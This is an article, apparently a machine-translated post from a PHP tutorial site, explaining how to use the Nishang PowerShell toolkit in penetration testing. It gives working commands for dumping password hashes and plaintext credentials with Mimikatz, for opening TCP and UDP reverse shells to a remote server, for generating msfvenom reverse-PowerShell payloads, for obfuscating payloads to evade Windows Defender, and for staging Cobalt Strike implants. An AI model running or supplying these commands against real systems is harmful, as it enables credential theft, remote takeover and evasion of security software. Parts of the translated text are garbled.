How to use Nishang, the PowerShell penetration testing tool

Initial PowerShell, first let’s understand the concept: PowerShell can be regarded as an upgraded version of cmd (bat scripting language), which is a scripting language on the Windows platform. It is object-oriented and closely related to .Net FrameWork. It can also be thought of as the bash shell on Windows. Windows PowerShell is a command-line shell and scripting environment that enables command-line users and scripters to take advantage of the power of the .NET Framework. It introduces many very useful new concepts that further expand the knowledge you gain and the scripts you create in the Windows Command Prompt and Windows Host environments. The code runs in memory without touching the disk. Many security products cannot detect the activities of PowerShell. cmd.exe is usually blocked from running, but PowerShell does not. In fact, we need to bypass some protective software during the penetration testing process. In addition to bypassing scripts or other tools, the PoweShell tool is also a good choice. For example, we use the password to capture the magical mimikatz on the target host. This magical tool written by a French expert is more commonly used by everyone. The most amazing one is that you can directly obtain the clear text password of the active Windows account from lsass.exe. . But if you don't do a good job of avoiding killing, you will be directly passed by a certain killing-free family bucket. Using Powershell, an attacker can execute commands without touching the disk. Here are some commonly used tools:

Introduction to Nishang

Nishang is a special tool for penetration testing based on PowerShell. It integrates scripts and various payloads, such as grabbing passwords, Port scanning, privilege escalation, etc. This tool is used frequently by novices in daily penetration testing. First we need to download this tool. The download address is: https://github.com/samratashok/nishang. After the download is complete, we can see what the following tools include

Below we use a specific experimental environment to demonstrate the commonly used modules in the penetration testing process. Before the demonstration, we need to explain several comparisons encountered when running the powershell tool. Common errors, such as permission issues for executing scripts, issues with importing modules, etc.

Powershell is not allowed when importing the module for the first time, because the default policy is not allowed. At this time, we need to change the execution policy to allow it, which is called remotesigned.

Let’s check what the current execution policy is. Restricted is not allowed to execute any scripts, even if you have administrator rights. We need to modify the permissions and execute the command:

Set-ExecutionPolicy remotesigned. When we query the current execution policy again, remotesigned is allowed. The script will be imported successfully again. Ignore the warning prompts that appear.

Execute to view the script information in the imported module: Get-Command -Module nishang

List the information of this machine: Get-Information

Now we have also modified the execution permission, let’s start our demonstration journey.

A wave of password capture

When we get a server, we need to know whether the target host is a physical machine or a virtual machine, execute the command: Check -VM

First of all, nishang also integrates a script to capture passwords. First capture the hash value:

#Get-PassHashes / /Simple and direct capture and display in dos interface;

#powershell –exec bypass –Command "& {Import-Module 'C:nishangGatherGet-PassHashes.ps1';Get-PassHashes -PSObjectFormat | Out- File hash.txt}" //Get the hash value and save it in a custom document.

Since we can capture the hash value, we can also capture the plaintext password. Let's first look at the script to capture the password. We can see that the tool Mimikatz is also used, but it is just loaded into the Powershell script.

We can use the following command to get the clear text password:

#powershell –exec bypass –Command "& {Import-Module 'C:nishangGatherInvoke-Mimikatz.ps1';Invoke-Mimikatz}" attempts to directly grab the clear text password of the current system user. (The most commonly used command)

Port rebound

During the penetration test, when we were doing port forwarding, we encountered a series of killings of FamilyMart buckets, nc\lcx\sockes agents, etc. were killed and intercepted from time to time. Then at this time we can use the port forwarding script in nishang. In addition to introducing the built-in port forwarding, here we also experiment with port forwarding with MSF, both of which require a public network server.

1. TCP port forwarding (reverse connection)

Execute the listening command on the public network server: nc -lvp 5555

The target host executes the port forwarding command: Invoke-PowerShellTcp -Reverse -IPAddress 106.xxx.xxx.115 -Port 5555

In this way, after we execute the commands on the target host and the public network respectively, the public network server will rebound a shell, so that we can execute the intranet Server commands.

2. UDP port forwarding (reverse connection)

Execute the monitoring command on the public network server: nc -lup 6666

The target host executes the port forwarding command: Invoke-PowerShellUdp -Reverse -IPAddress 106.xxx.xxx.115 -Port 6666

##Except for reverse Connections also have forward connections. I often use reverse connections in penetration testing. If the big guys are interested in forward connections, you can try them out. Okay, now we use powershell and MSF for port forwarding. First, we use the command to check whether there is a powershell module in MSF:

##msfvenom -l payloads |grep 'reverse_powershell //Query the location of the powershell module .

We use MSF to generate a command for a rebound port:

##msfvenom -p cmd/windows/reverse_powershell lhost=106.xxx .xxx.115 lport=9999 r //Generate payload, the type is Powershell, the section marked in red is the command that needs to be executed on the target host.

Next step, we execute the powershell command we just generated on the target host and listen to port 9999 on the public network server. In this way, we can successfully bounce the shell of the target host to the public network server.

We will also think about how we can use obfuscation to bypass Windows Defender on the target host, because the ordinary payload we generate will be killed by Windows Defender. , so we need to bypass this check mechanism. Let’s take the above payload as an example to obfuscate it to bypass Windows Defender. Sometimes we run the ordinary payload we generate directly on the target host, and it may be directly intercepted by Windows Defender. The tool for obfuscation is undoubtedly Invoke-Obfuscation provided by Daniel Bohannon. The project's Github page can be found.

First we start the Invoke-Obfuscation tool:

Import-Module ./Invoke-Obfuscation.psd1 //Import Invoke-Obfuscation.psd1;

Invoke-Obfuscation //Start the Invoke-Obfuscation tool;

Now we will obfuscate the payload of the port forwarding we just generated. Let’s first look at the various obfuscations. Parameters of processing method:

Which parts of the payload need to be obfuscated, we must specify them in advance, which can be done through the following command:

Set scriptblock 'payload';

We choose to obfuse the entire command as a string (the specific choice is based on the specific penetration testing environment):

Select 1 for ASCII obfuscation, we enter out 1.ps1 to view the output. This command is also equivalent to saving the obfuscated file in the current directory and 1.ps1:

in the target Execute this script on the host. The public network server listens to port 9999, and can also successfully rebound the shell of the intranet host:

powershell and cobaltstrike tools Create a different spark

Cobalt Strike is a GUI framework penetration testing tool based on Metasploit, which integrates port forwarding, service scanning, automated overflow, and multi-mode port monitoring. exe, powershell Trojan generation, etc. This tool is also a powerful tool for intranet penetration. We are just talking about what kind of sparks can powershell and Cobalt Strike touch?

Cobalt Strike needs to be installed on the client and server respectively, and then start this tool:

First we listen to a port, write the public IP address as the host address, then generate a powershell command, run this command on the target host, the target host will come online, and then we can remotely capture passwords and escalate privileges , monitoring and other operations:

##To be honest, these are the two tools I The sparks created here are just a little bit, and there are many other operations. Interested experts can study it. This tool is often used in intranet penetration.

The above is the detailed content of How to use Nishang, the PowerShell penetration testing tool. For more information, please follow other related articles on the PHP Chinese website!